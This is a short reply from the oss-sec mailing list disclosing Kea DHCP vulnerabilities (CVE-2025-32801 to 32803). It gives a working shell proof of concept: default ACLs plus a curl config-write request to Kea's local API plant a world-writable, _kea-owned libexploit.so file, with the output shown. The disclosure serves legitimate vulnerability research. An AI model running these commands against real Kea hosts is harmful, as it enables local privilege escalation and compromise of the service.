oss-sec mailing list archives

* Matthias Gerstner <mgerstner () suse de>, 2025-05-28 19:21:

By leveraging issue 3.2), the Kea services can be instructed to create `_kea` owned files in the attacker's `$HOME/.Private`. The content of the created files is not fully attacker controlled, however, so it will not be possible to craft a valid ELF object for loading via `dlopen()` this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`, any files created in this directory will even have the group-ownership of the attacker. The file mode will be 0644, however,

Default ACLs to the rescue!

$ chmod a+x ~
$ mkdir -m 777 ~/.Private
$ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
$ curl -s -H "Content-Type: application/json" -d '{ "command": "config-write", "arguments": { "filename": 
"'"$HOME"'/.Private/libexploit.so" } }' localhost:8000 > /dev/null
$ echo pwned > ~/.Private/libexploit.so
$ ls -l ~/.Private/libexploit.so
-rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
$ cat ~/.Private/libexploit.so
pwned

--
Jakub Wilk

Current thread:

• ISC has disclosed three vulnerabilities in Kea (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803) Andrei Pavel (May 28)
  • Re: ISC has disclosed three vulnerabilities in Kea (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803) Matthias Gerstner (May 28)
    • Re: ISC has disclosed three vulnerabilities in Kea (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803) Jakub Wilk (May 28)
  • RE: ISC has disclosed three vulnerabilities in Kea (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803) Jounee Kim (May 28)
    • how to unsubscribe (Re: ISC has disclosed three vulnerabilities in Kea (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803)) Solar Designer (May 28)